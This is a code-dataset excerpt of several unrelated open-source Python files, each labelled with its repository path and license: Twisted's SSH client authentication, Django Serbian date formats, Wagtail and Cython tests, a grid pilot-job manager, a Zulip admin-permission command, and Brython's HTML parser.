d = d.addCallbacks(self._setOldPass, self._ebAuth)
d.addCallback(lambda ignored: self.getPassword(prompt))
d.addCallbacks(self._setNewPass, self._ebAuth)
def ssh_USERAUTH_PK_OK_keyboard_interactive(self, packet):
"""
This is MSG_USERAUTH_INFO_RESPONSE. The server has sent us the
questions it wants us to answer, so we ask the user and sent the
responses.
"""
name, instruction, lang, data = getNS(packet, 3)
numPrompts = struct.unpack('!L', data[:4])[0]
data = data[4:]
prompts = []
for i in range(numPrompts):
prompt, data = getNS(data)
echo = bool(ord(data[0]))
data = data[1:]
prompts.append((prompt, echo))
d = self.getGenericAnswers(name, instruction, prompts)
d.addCallback(self._cbGenericAnswers)
d.addErrback(self._ebAuth)
def _cbSignedData(self, signedData):
"""
Called back out of self.signData with the signed data. Send the
authentication request with the signature.
@param signedData: the data signed by the user's private key.
@type signedData: C{str}
"""
publicKey = self.lastPublicKey
self.askForAuth('publickey', '\xff' + NS(publicKey.sshType()) +
NS(publicKey.blob()) + NS(signedData))
def _setOldPass(self, op):
"""
Called back when we are choosing a new password. Simply store the old
password for now.
@param op: the old password as entered by the user
@type op: C{str}
"""
self._oldPass = op
def _setNewPass(self, np):
"""
Called back when we are choosing a new password. Get the old password
and send the authentication message with both.
@param np: the new password as entered by the user
@type np: C{str}
"""
op = self._oldPass
self._oldPass = None
self.askForAuth('password', '\xff' + NS(op) + NS(np))
def _cbGenericAnswers(self, responses):
"""
Called back when we are finished answering keyboard-interactive
questions. Send the info back to the server in a
MSG_USERAUTH_INFO_RESPONSE.
@param responses: a list of C{str} responses
@type responses: C{list}
"""
data = struct.pack('!L', len(responses))
for r in responses:
data += NS(r.encode('UTF8'))
self.transport.sendPacket(MSG_USERAUTH_INFO_RESPONSE, data)
def auth_publickey(self):
"""
Try to authenticate with a public key. Ask the user for a public key;
if the user has one, send the request to the server and return True.
Otherwise, return False.
@rtype: C{bool}
"""
d = defer.maybeDeferred(self.getPublicKey)
d.addBoth(self._cbGetPublicKey)
return d
def _cbGetPublicKey(self, publicKey):
if isinstance(publicKey, str):
warnings.warn("Returning a string from "
"SSHUserAuthClient.getPublicKey() is deprecated "
"since Twisted 9.0. Return a keys.Key() instead.",
DeprecationWarning)
publicKey = keys.Key.fromString(publicKey)
if not isinstance(publicKey, keys.Key): # failure or None
publicKey = None
if publicKey is not None:
self.lastPublicKey = publicKey
self.triedPublicKeys.append(publicKey)
log.msg('using key of type %s' % publicKey.type())
self.askForAuth('publickey', '\x00' + NS(publicKey.sshType()) +
NS(publicKey.blob()))
return True
else:
return False
def auth_password(self):
"""
Try to authenticate with a password. Ask the user for a password.
If the user will return a password, return True. Otherwise, return
False.
@rtype: C{bool}
"""
d = self.getPassword()
if d:
d.addCallbacks(self._cbPassword, self._ebAuth)
return True
else: # returned None, don't do password auth
return False
def auth_keyboard_interactive(self):
"""
Try to authenticate with keyboard-interactive authentication. Send
the request to the server and return True.
@rtype: C{bool}
"""
log.msg('authing with keyboard-interactive')
self.askForAuth('keyboard-interactive', NS('') + NS(''))
return True
def _cbPassword(self, password):
"""
Called back when the user gives a password. Send the request to the
server.
@param password: the password the user entered
@type password: C{str}
"""
self.askForAuth('password', '\x00' + NS(password))
def signData(self, publicKey, signData):
"""
Sign the given data with the given public key.
By default, this will call getPrivateKey to get the private key,
then sign the data using Key.sign().
This method is factored out so that it can be overridden to use
alternate methods, such as a key agent.
@param publicKey: The public key object returned from L{getPublicKey}
@type publicKey: L{keys.Key}
@param signData: the data to be signed by the private key.
@type signData: C{str}
@return: a Deferred that's called back with the signature
@rtype: L{defer.Deferred}
"""
key = self.getPrivateKey()
if not key:
return
return key.addCallback(self._cbSignData, signData)
def _cbSignData(self, privateKey, signData):
"""
Called back when the private key is returned. Sign the data and
return the signature.
@param privateKey: the private key object
@type publicKey: L{keys.Key}
@param signData: the data to be signed by the private key.
@type signData: C{str}
@return: the signature
@rtype: C{str}
"""
if not isinstance(privateKey, keys.Key):
warnings.warn("Returning a PyCrypto key object from "
"SSHUserAuthClient.getPrivateKey() is deprecated "
"since Twisted 9.0. Return a keys.Key() instead.",
DeprecationWarning)
privateKey = keys.Key(privateKey)
return privateKey.sign(signData)
def getPublicKey(self):
"""
Return a public key for the user. If no more public keys are
available, return C{None}.
This implementation always returns C{None}. Override it in a
subclass to actually find and return a public key object.
@rtype: L{Key} or L{NoneType}
"""
return None
def getPrivateKey(self):
"""
Return a L{Deferred} that will be called back with the private key
object corresponding to the last public key from getPublicKey().
If the private key is not available, errback on the Deferred.
@rtype: L{Deferred} called back with L{Key}
"""
return defer.fail(NotImplementedError())
def getPassword(self, prompt = None):
"""
Return a L{Deferred} that will be called back with a password.
prompt is a string to display for the password, or None for a generic
'user@hostname's password: '.
@type prompt: C{str}/C{None}
@rtype: L{defer.Deferred}
"""
return defer.fail(NotImplementedError())
def getGenericAnswers(self, name, instruction, prompts):
"""
Returns a L{Deferred} with the responses to the promopts.
@param name: The name of the authentication currently in progress.
@param instruction: Describes what the authentication wants.
@param prompts: A list of (prompt, echo) pairs, where prompt is a
string to display and echo is a boolean indicating whether the
user's response should be echoed as they type it.
"""
return defer.fail(NotImplementedError())
MSG_USERAUTH_REQUEST = 50
MSG_USERAUTH_FAILURE = 51
MSG_USERAUTH_SUCCESS = 52
MSG_USERAUTH_BANNER = 53
MSG_USERAUTH_PASSWD_CHANGEREQ = 60
MSG_USERAUTH_INFO_REQUEST = 60
MSG_USERAUTH_INFO_RESPONSE = 61
MSG_USERAUTH_PK_OK = 60
messages = {}
for k, v in locals().items():
if k[:4]=='MSG_':
messages[v] = k # doesn't handle doubles
SSHUserAuthServer.protocolMessages = messages
SSHUserAuthClient.protocolMessages = messages
del messages
del v
| agpl-3.0 |
robhudson/django | django/conf/locale/sr/formats.py | 1008 | 2011 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y.'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y. H:i'
YEAR_MONTH_FORMAT = 'F Y.'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'j.m.Y.'
SHORT_DATETIME_FORMAT = 'j.m.Y. H:i'
FIRST_DAY_OF_WEEK = 1
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d.%m.%Y.', '%d.%m.%y.', # '25.10.2006.', '25.10.06.'
'%d. %m. %Y.', '%d. %m. %y.', # '25. 10. 2006.', '25. 10. 06.'
# '%d. %b %y.', '%d. %B %y.', # '25. Oct 06.', '25. October 06.'
# '%d. %b \'%y.', '%d. %B \'%y.', # '25. Oct '06.', '25. October '06.'
# '%d. %b %Y.', '%d. %B %Y.', # '25. Oct 2006.', '25. October 2006.'
]
DATETIME_INPUT_FORMATS = [
'%d.%m.%Y. %H:%M:%S', # '25.10.2006. 14:30:59'
'%d.%m.%Y. %H:%M:%S.%f', # '25.10.2006. 14:30:59.000200'
'%d.%m.%Y. %H:%M', # '25.10.2006. 14:30'
'%d.%m.%Y.', # '25.10.2006.'
'%d.%m.%y. %H:%M:%S', # '25.10.06. 14:30:59'
'%d.%m.%y. %H:%M:%S.%f', # '25.10.06. 14:30:59.000200'
'%d.%m.%y. %H:%M', # '25.10.06. 14:30'
'%d.%m.%y.', # '25.10.06.'
'%d. %m. %Y. %H:%M:%S', # '25. 10. 2006. 14:30:59'
'%d. %m. %Y. %H:%M:%S.%f', # '25. 10. 2006. 14:30:59.000200'
'%d. %m. %Y. %H:%M', # '25. 10. 2006. 14:30'
'%d. %m. %Y.', # '25. 10. 2006.'
'%d. %m. %y. %H:%M:%S', # '25. 10. 06. 14:30:59'
'%d. %m. %y. %H:%M:%S.%f', # '25. 10. 06. 14:30:59.000200'
'%d. %m. %y. %H:%M', # '25. 10. 06. 14:30'
'%d. %m. %y.', # '25. 10. 06.'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
| bsd-3-clause |
srsman/odoo | addons/stock_landed_costs/__init__.py | 373 | 1087 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import product
import stock_landed_costs
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
rguillebert/CythonCTypesBackend | tests/run/methodmangling_T5.py | 30 | 1847 | # mode: run
# ticket: 5
class CyTest(object):
"""
>>> cy = CyTest()
>>> '_CyTest__private' in dir(cy)
True
>>> cy._CyTest__private()
8
>>> '__private' in dir(cy)
False
>>> '_CyTest__x' in dir(cy)
True
>>> '__x' in dir(cy)
False
"""
__x = 1
def __private(self): return 8
def get(self):
"""
>>> CyTest().get()
(1, 1, 8)
"""
return self._CyTest__x, self.__x, self.__private()
def get_inner(self):
"""
>>> CyTest().get_inner()
(1, 1, 8)
"""
def get(o):
return o._CyTest__x, o.__x, o.__private()
return get(self)
class CyTestSub(CyTest):
"""
>>> cy = CyTestSub()
>>> '_CyTestSub__private' in dir(cy)
True
>>> cy._CyTestSub__private()
9
>>> '_CyTest__private' in dir(cy)
True
>>> cy._CyTest__private()
8
>>> '__private' in dir(cy)
False
>>> '_CyTestSub__x' in dir(cy)
False
>>> '_CyTestSub__y' in dir(cy)
True
>>> '_CyTest__x' in dir(cy)
True
>>> '__x' in dir(cy)
False
"""
__y = 2
def __private(self): return 9
def get(self):
"""
>>> CyTestSub().get()
(1, 2, 2, 9)
"""
return self._CyTest__x, self._CyTestSub__y, self.__y, self.__private()
def get_inner(self):
"""
>>> CyTestSub().get_inner()
(1, 2, 2, 9)
"""
def get(o):
return o._CyTest__x, o._CyTestSub__y, o.__y, o.__private()
return get(self)
class _UnderscoreTest(object):
"""
>>> ut = _UnderscoreTest()
>>> '__x' in dir(ut)
False
>>> '_UnderscoreTest__x' in dir(ut)
True
>>> ut._UnderscoreTest__x
1
>>> ut.get()
1
"""
__x = 1
def get(self):
return self.__x
| apache-2.0 |
torchbox/wagtail | wagtail/core/tests/test_views.py | 24 | 1449 | from django.test import TestCase
from django.urls import reverse
from wagtail.core.models import Page
from wagtail.tests.utils import WagtailTestUtils
class TestLoginView(TestCase, WagtailTestUtils):
fixtures = ['test.json']
def setUp(self):
self.user = self.create_test_user()
self.events_index = Page.objects.get(url_path='/home/events/')
def test_get(self):
response = self.client.get(reverse('wagtailcore_login'))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<h1>Log in</h1>")
self.assertNotContains(response, "<p>Your username and password didn't match. Please try again.</p>")
def test_post_incorrect_password(self):
response = self.client.post(reverse('wagtailcore_login'), {
'username': 'test@email.com',
'password': 'wrongpassword',
'next': self.events_index.url,
})
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<h1>Log in</h1>")
self.assertContains(response, "<p>Your username and password didn't match. Please try again.</p>")
def test_post_correct_password(self):
response = self.client.post(reverse('wagtailcore_login'), {
'username': 'test@email.com',
'password': 'password',
'next': self.events_index.url,
})
self.assertRedirects(response, self.events_index.url)
| bsd-3-clause |
supermanue/montera | NewPilotInfrastructure.py | 1 | 11232 | '''
Created on Aug 24, 2012
@author: u5682
'''
from GridTask import GridTask
from Host import Host
from FakeHost import FakeHost
from Pilot import Pilot
import ExecutionManager
from Infrastructure import Infrastructure
from PilotResource import PilotResource
from InformationManager import obtainGWResources
import subprocess as sub
import xml.dom.minidom
from xml.dom.minidom import Node
import os, sys, time
from datetime import datetime, timedelta
from DRMAA import *
import InformationManager
from datetime import datetime
from base import Session
import base
from sqlalchemy import func
class NewPilotInfrastructure(Infrastructure):
'''
classdocs
'''
def __init__(self, *args, **kwargs):
super(NewPilotInfrastructure, self).__init__()
print ("Initializingi newPilot infrastructure. 0 pilots loaded")
self.pilots = []
#HOST: pilots corriendo, que pueden ejecutar trabajos. Se llaman pilot_X
#SITE: sitio remoto donde se ejecutan los pilots,
#Resource: pilot o site.
def getHost(self, hostname):
foundHost = None
for host in self.hosts:
if host.hostname.strip().lower() == hostname:
return host
for pilot in self.pilots:
if pilot.hostname.strip().lower() == hostname:
return pilot
return None
#PRIMERO ACTUALIZAMOS EL ESTADO DE LOS PILOTS Y LUEGO EL DE LOS HOTSTS
def updateStatus (self, gridTasks):
print ("UPDATE STATUS")
GWHosts = obtainGWResources()
if GWHosts ==[]:
print("Error when parsing host information file, employing information from past executions")
return GWHosts
#PILOTS
pastPilots = Session.query(Pilot).all()
presentPilots = []
#load XML to memory and extract data from hosts
for resource in GWHosts:
hostname = resource.getElementsByTagName("HOSTNAME")[0].firstChild.data.strip().lower() #TODO: remove "unicode" from TEXT
try:
foundLrms = resource.getElementsByTagName("LRMS_NAME")[0].firstChild.data.strip().lower()
except:
print ("Could not obtain resource LRMS, skipping it")
continue
if foundLrms != "jobmanager-pilot":
continue
#ahora son todos pilots
try:
freeNodeCount = int(resource.getElementsByTagName("FREENODECOUNT")[0].firstChild.data)
except:
freeNodeCount = 0
if not freeNodeCount > 0:
continue;
for pilot in pastPilots:
if pilot.hostname == hostname:
presentPilots.append(pilot)
break
#the pilots that we will first employ are the resulting ones
self.pilots = presentPilots
#devuelve una lista de los hosts que sabemos que funcionan
#AQUI SOLO DEVUELVO PILOTS
def getGoodHosts(self):
goddHosts=[]
for pilot in self.pilots:
if pilot.getWhetstones() > 0:
goddHosts.append(pilot)
return goddHosts
def load(self):
print ("LOAD - pilotInfrastructures")
#SITES
pastHosts = Session.query(Host).filter(Host.type=="hosts").all()
presentHosts = []
#PILOTS
pastPilots = Session.query(Pilot).all()
print ("Deleting all past pilots from database")
for pilot in pastPilots:
base.Session.delete(pilot)
presentPilots = []
GWHosts = obtainGWResources()
print ("Updating information")
#load XML to memory and extract data from hosts
try:
for resource in GWHosts:
hostname = resource.getElementsByTagName("HOSTNAME")[0].firstChild.data.strip().lower() #TODO: remove "unicode" from TEXT
try:
foundLrms = resource.getElementsByTagName("LRMS_NAME")[0].firstChild.data
except:
print ("Could not obtain resource LRMS for site " + hostname + ", skipping it")
continue
if foundLrms == "jobmanager-pilot":
#nombre de pilot
genericArgs = resource.getElementsByTagName("GENERIC_VAR_STR")
for node in genericArgs:
if node.attributes['NAME'].value =="PILOT_REAL_HOSTNAME":
workerNode = node.attributes['VALUE'].value.strip().lower()
if node.attributes['NAME'].value =="PILOT_REAL_RESOURCE":
site = node.attributes['VALUE'].value.strip().lower()
#numero de nodos libres. Esto en los pilots funciona bien, y es lo que se emplea para saber si está
#activo o apagado
try:
freeNodeCount = int(resource.getElementsByTagName("FREENODECOUNT")[0].firstChild.data)
except:
freeNodeCount = 0
if not freeNodeCount > 0:
continue;
#cargamos el pilot en la base de datos:
#primero buscamos el pilotResource, o lo creamos si no existe
#después creamos el pilot que emplee ese recurso
pilotResource = base.Session.query(PilotResource).filter(PilotResource.site == site, PilotResource.workerNode == workerNode).first()
if pilotResource == None:
pilotResource = PilotResource(site, workerNode)
pilot = Pilot(hostname, pilotResource=pilotResource)
presentPilots.append(pilot)
else: #it is a site
for host in pastHosts:
if host.hostname == hostname:
presentHosts.append(host)
break
except:
print("Error when parsing host information file, employing information from past executions")
self.hosts = pastHosts
self.pilots = []
return
#the hosts that we will first employ are the resulting ones
self.pilots = presentPilots
self.hosts = presentHosts
def showHosts(self):
print ("...........")
print ("Showing host list")
total = len(self.hosts)
print ("Total number of Hosts: " + str(total))
print ("")
print ("Hosts: ")
for site in self.hosts:
print (site.hostname)
print ("")
print ("Pilots: ")
for pilot in self.pilots:
print (pilot.hostname + ", " + str(pilot.getWhetstones()) + " whet")
print ("---")
#TODO: Este nombre es una mierda y no refleja bien su función. Hay que cambiarlo
def createInfrastructureTasks(self, infrastructureTasks):
print ("-------------------")
print ("-------------------")
print ("createInfrastructureTasks- NewPilotInfrastructure")
# self.showHosts()
hostList = obtainGWResources()
hostsToProfile = []
print ("Analyzing resources ")
for hostInfo in hostList:
hostName = hostInfo.getElementsByTagName("HOSTNAME")[0].firstChild.data.strip().lower() #TODO: remove "unicode" from TEXT
whetstones=0
try:
foundArch = hostInfo.getElementsByTagName("ARCH")[0].firstChild.data
except:
foundArch=""
try:
foundCpuMHz = int(hostInfo.getElementsByTagName("CPU_MHZ")[0].firstChild.data)
except:
foundCpuMHz = 0
try:
foundLrms = hostInfo.getElementsByTagName("LRMS_NAME")[0].firstChild.data.strip().lower()
except:
foundLrms = None
print ("Could not find LRMS for host " + hostName + ", skipping it")
continue
try:
freeNodeCount = int(hostInfo.getElementsByTagName("FREENODECOUNT")[0].firstChild.data)
except:
freeNodeCount = 0
if foundLrms == "jobmanager-pilot":
#solo tenemos en cuenta los pilots con al menos un slot disponible
if not freeNodeCount > 0:
continue
username = os.getenv("USER")
genericStringArgs = hostInfo.getElementsByTagName("GENERIC_VAR_STR")
for node in genericStringArgs:
if node.attributes['NAME'].value =="PILOT_REAL_HOSTNAME":
workerNode = node.attributes['VALUE'].value.strip().lower()
if node.attributes['NAME'].value =="PILOT_REAL_RESOURCE":
site = node.attributes['VALUE'].value.strip().lower()
genericIntArgs = hostInfo.getElementsByTagName("GENERIC_VAR_INT")
for node in genericIntArgs:
if node.attributes['NAME'].value =="PILOT_" + username + "_VAR_5":
whetstones = int(node.attributes['VALUE'].value.strip().lower())
if whetstones > 65534:
whetstones = 0
# whetstones = 0
#if host is unknown, create a profiling task
currentHost = self.getHost(hostName)
if currentHost == None:
print ("Host/Pilot not found. hostname: " + hostName + ", LRMS: " + foundLrms)
if foundLrms == "jobmanager-pilot":
#he encontrado un pilot:
#primero busco e resource, y si no existe lo creo.
#luego creo un pilot que utilice ese resource
pilotResource = base.Session.query(PilotResource).filter(PilotResource.site == site, PilotResource.workerNode == workerNode).first()
if pilotResource == None:
print (" PilotResource was not found, creating a new one")
pilotResource = PilotResource(site, workerNode)
print (" Creating a new Pilot in NewPilotInfrastructure.createInfrastructureTasks")
newHost = Pilot(hostName, arch=foundArch, cpuMHz = foundCpuMHz, pilotResource = pilotResource, whetstones = whetstones)
self.pilots.append(newHost)
Session.add(newHost)
else:
print (" Creating a new Host in NewPilotInfrastructure.createInfrastructureTasks")
newHost = Host(hostName, arch=foundArch, cpuMHz = foundCpuMHz, lrms=foundLrms)
self.hosts.append(newHost)
Session.add(newHost)
#ESTO ES PARA HACER EL PROFILING DE LOS PILOT SI NO HAN PUBLICADO LOS WHETSTONES, SI NO NO HACE FALTA
#===============================================================
# if whetstones == 0 or whetstones > 65534:
# whetstones = 0
# print (" Host to profile: " + hostName + ": whetstone value not initialized ")
# hostsToProfile.append(newHost)
# #store new host on databae (faiulre resistance
# Session.add(newHost)
#===============================================================
#if information has changed, update host information
elif (currentHost.getWhetstones() != whetstones):
#va con un set porque es una operación más complicada, así que está encapsulada en esta funcion
currentHost.setWhetstones(whetstones)
Session.add(currentHost)
print ("Host: " + hostName + " UPDATED, new whetstones=" + str(whetstones))
elif currentHost.lrms == None:
currentHost.lrms = foundLrms
#pprofiling of new sites
hostProfilingTasks = [ExecutionManager.createHostProfilingTask(host)
for host in hostsToProfile
for i in range(base.profilingTasksPerHost)]
#estamos asumiento que todos los pilots publican la variable esa con su
#rendimiento, con lo que no hay que hacer el profiling de nada.
#AHORA, EN ESA NUEVA APROXIMACION, QUEREMOS TENER UNOS CUANTO SBENCHMARKS PARA IR ARRANCANDO PILOTS
print ("creating fake profiling tasks")
existingFakeTasks = len([task for task in infrastructureTasks if task.host.hostname=="" and task.status != "PENDING"])
existingGoodPilots = len (self.getGoodHosts())
existingProfilingTasks = len(hostProfilingTasks)
#fakeTasksToCreate = base.maxRunningTasks - (existingFakeTasks + existingGoodPilots + existingProfilingTasks)
fakeTasksToCreate = base.maxRunningTasks - existingFakeTasks
print (" Desired tasks: " + str(base.maxRunningTasks))
print (" Existing fake tasks: " + str(existingFakeTasks))
print (" Existing good pilots: " + str(existingGoodPilots))
print (" created: " + str(fakeTasksToCreate))
emptyHost = FakeHost()
fakeHostProfilingTasks = [ExecutionManager.createFakeHostProfilingTask(emptyHost)
for i in range(fakeTasksToCreate)]
hostProfilingTasks+=fakeHostProfilingTasks
return hostProfilingTasks
| gpl-2.0 |
dattatreya303/zulip | zerver/management/commands/knight.py | 15 | 2864 | from __future__ import absolute_import
from __future__ import print_function
from typing import Any
from argparse import ArgumentParser
from django.core.management.base import BaseCommand, CommandError
from django.core.exceptions import ValidationError
from zerver.lib.actions import do_change_is_admin
from zerver.models import UserProfile
class Command(BaseCommand):
help = """Give an existing user administrative permissions over their (own) Realm.
ONLY perform this on customer request from an authorized person.
"""
def add_arguments(self, parser):
# type: (ArgumentParser) -> None
parser.add_argument('-f', '--for-real',
dest='ack',
action="store_true",
default=False,
help='Acknowledgement that this is done according to policy.')
parser.add_argument('--revoke',
dest='grant',
action="store_false",
default=True,
help='Remove an administrator\'s rights.')
parser.add_argument('--permission',
dest='permission',
action="store",
default='administer',
help='Permission to grant/remove.')
parser.add_argument('email', metavar='<email>', type=str,
help="email of user to knight")
def handle(self, *args, **options):
# type: (*Any, **Any) -> None
email = options['email']
try:
profile = UserProfile.objects.get(email=email)
except ValidationError:
raise CommandError("No such user.")
if options['grant']:
if profile.has_perm(options['permission'], profile.realm):
raise CommandError("User already has permission for this realm.")
else:
if options['ack']:
do_change_is_admin(profile, True, permission=options['permission'])
print("Done!")
else:
print("Would have granted %s %s rights for %s" % (
email, options['permission'], profile.realm.string_id))
else:
if profile.has_perm(options['permission'], profile.realm):
if options['ack']:
do_change_is_admin(profile, False, permission=options['permission'])
print("Done!")
else:
print("Would have removed %s's %s rights on %s" % (email, options['permission'],
profile.realm.string_id))
else:
raise CommandError("User did not have permission for this realm!")
| apache-2.0 |
40223231/2015cd_midterm2 | static/Brython3.1.1-20150328-091302/Lib/html/parser.py | 737 | 19605 | """A parser for HTML and XHTML."""
# This file is based on sgmllib.py, but the API is slightly different.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special).
import _markupbase
import re
import warnings
# Regular expressions used for parsing
interesting_normal = re.compile('[&<]')
incomplete = re.compile('&[a-zA-Z#]')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')
starttagopen = re.compile('<[a-zA-Z]')
piclose = re.compile('>')
commentclose = re.compile(r'--\s*>')
tagfind = re.compile('([a-zA-Z][-.a-zA-Z0-9:_]*)(?:\s|/(?!>))*')
# see http://www.w3.org/TR/html5/tokenization.html#tag-open-state
# and http://www.w3.org/TR/html5/tokenization.html#tag-name-state
tagfind_tolerant = re.compile('[a-zA-Z][^\t\n\r\f />\x00]*')
# Note:
# 1) the strict attrfind isn't really strict, but we can't make it
# correctly strict without breaking backward compatibility;
# 2) if you change attrfind remember to update locatestarttagend too;
# 3) if you change attrfind and/or locatestarttagend the parser will
# explode, so don't do it.
attrfind = re.compile(
r'\s*([a-zA-Z_][-.:a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[^\s"\'=<>`]*))?')
attrfind_tolerant = re.compile(
r'((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*')
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
locatestarttagend_tolerant = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:[\s/]* # optional whitespace before attribute name
(?:(?<=['"\s/])[^\s/>][^\s/=>]* # attribute name
(?:\s*=+\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|"[^"]*" # LIT-enclosed value
|(?!['"])[^>\s]* # bare value
)
(?:\s*,)* # possibly followed by a comma
)?(?:\s|/(?!>))*
)*
)?
\s* # trailing whitespace
""", re.VERBOSE)
endendtag = re.compile('>')
# the HTML 5 spec, section 8.1.2.2, doesn't allow spaces between
# </ and the tag name, so maybe this should be fixed
endtagfind = re.compile('</\s*([a-zA-Z][-.a-zA-Z0-9:_]*)\s*>')
class HTMLParseError(Exception):
"""Exception raised for all parse errors."""
def __init__(self, msg, position=(None, None)):
assert msg
self.msg = msg
self.lineno = position[0]
self.offset = position[1]
def __str__(self):
result = self.msg
if self.lineno is not None:
result = result + ", at line %d" % self.lineno
if self.offset is not None:
result = result + ", column %d" % (self.offset + 1)
return result
class HTMLParser(_markupbase.ParserBase):
"""Find tags and other markup and call handler functions.
Usage:
p = HTMLParser()
p.feed(data)
...
p.close()
Start tags are handled by calling self.handle_starttag() or
self.handle_startendtag(); end tags by self.handle_endtag(). The
data between tags is passed from the parser to the derived class
by calling self.handle_data() with the data as argument (the data
may be split up in arbitrary chunks). Entity references are
passed by calling self.handle_entityref() with the entity
reference as the argument. Numeric character references are
passed to self.handle_charref() with the string containing the
reference as the argument.
"""
CDATA_CONTENT_ELEMENTS = ("script", "style")
def __init__(self, strict=False):
"""Initialize and reset this instance.
If strict is set to False (the default) the parser will parse invalid
markup, otherwise it will raise an error. Note that the strict mode
is deprecated.
"""
if strict:
warnings.warn("The strict mode is deprecated.",
DeprecationWarning, stacklevel=2)
self.strict = strict
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.rawdata = ''
self.lasttag = '???'
self.interesting = interesting_normal
self.cdata_elem = None
_markupbase.ParserBase.reset(self)
def feed(self, data):
r"""Feed data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n').
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle any buffered data."""
self.goahead(1)
def error(self, message):
raise HTMLParseError(message, self.getpos())
__starttag_text = None
def get_starttag_text(self):
"""Return full source of start tag: '<...>'."""
return self.__starttag_text
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
def clear_cdata_mode(self):
self.interesting = interesting_normal
self.cdata_elem = None
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
match = self.interesting.search(rawdata, i) # < or &
if match:
j = match.start()
else:
if self.cdata_elem:
break
j = n
if i < j: self.handle_data(rawdata[i:j])
i = self.updatepos(i, j)
if i == n: break
startswith = rawdata.startswith
if startswith('<', i):
if starttagopen.match(rawdata, i): # < + letter
k = self.parse_starttag(i)
elif startswith("</", i):
k = self.parse_endtag(i)
elif startswith("<!--", i):
k = self.parse_comment(i)
elif startswith("<?", i):
k = self.parse_pi(i)
elif startswith("<!", i):
if self.strict:
k = self.parse_declaration(i)
else:
k = self.parse_html_declaration(i)
elif (i + 1) < n:
self.handle_data("<")
k = i + 1
else:
break
if k < 0:
if not end:
break
if self.strict:
self.error("EOF in middle of construct")
k = rawdata.find('>', i + 1)
if k < 0:
k = rawdata.find('<', i + 1)
if k < 0:
k = i + 1
else:
k += 1
self.handle_data(rawdata[i:k])
i = self.updatepos(i, k)
elif startswith("&#", i):
match = charref.match(rawdata, i)
if match:
name = match.group()[2:-1]
self.handle_charref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
else:
if ";" in rawdata[i:]: #bail by consuming &#
self.handle_data(rawdata[0:2])
i = self.updatepos(i, 2)
break
elif startswith('&', i):
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
match = incomplete.match(rawdata, i)
if match:
# match.group() will contain at least 2 chars
if end and match.group() == rawdata[i:]:
if self.strict:
self.error("EOF in middle of entity or char ref")
else:
k = match.end()
if k <= i:
k = n
i = self.updatepos(i, i + 1)
# incomplete
break
elif (i + 1) < n:
# not the end of the buffer, and can't be confused
# with some other construct
self.handle_data("&")
i = self.updatepos(i, i + 1)
else:
break
else:
assert 0, "interesting.search() lied"
# end while
if end and i < n and not self.cdata_elem:
self.handle_data(rawdata[i:n])
i = self.updatepos(i, n)
self.rawdata = rawdata[i:]
# Internal -- parse html declarations, return length or -1 if not terminated
# See w3.org/TR/html5/tokenization.html#markup-declaration-open-state
# See also parse_declaration in _markupbase
def parse_html_declaration(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<!', ('unexpected call to '
'parse_html_declaration()')
if rawdata[i:i+4] == '<!--':
# this case is actually already handled in goahead()
return self.parse_comment(i)
elif rawdata[i:i+3] == '<![':
return self.parse_marked_section(i)
elif rawdata[i:i+9].lower() == '<!doctype':
# find the closing >
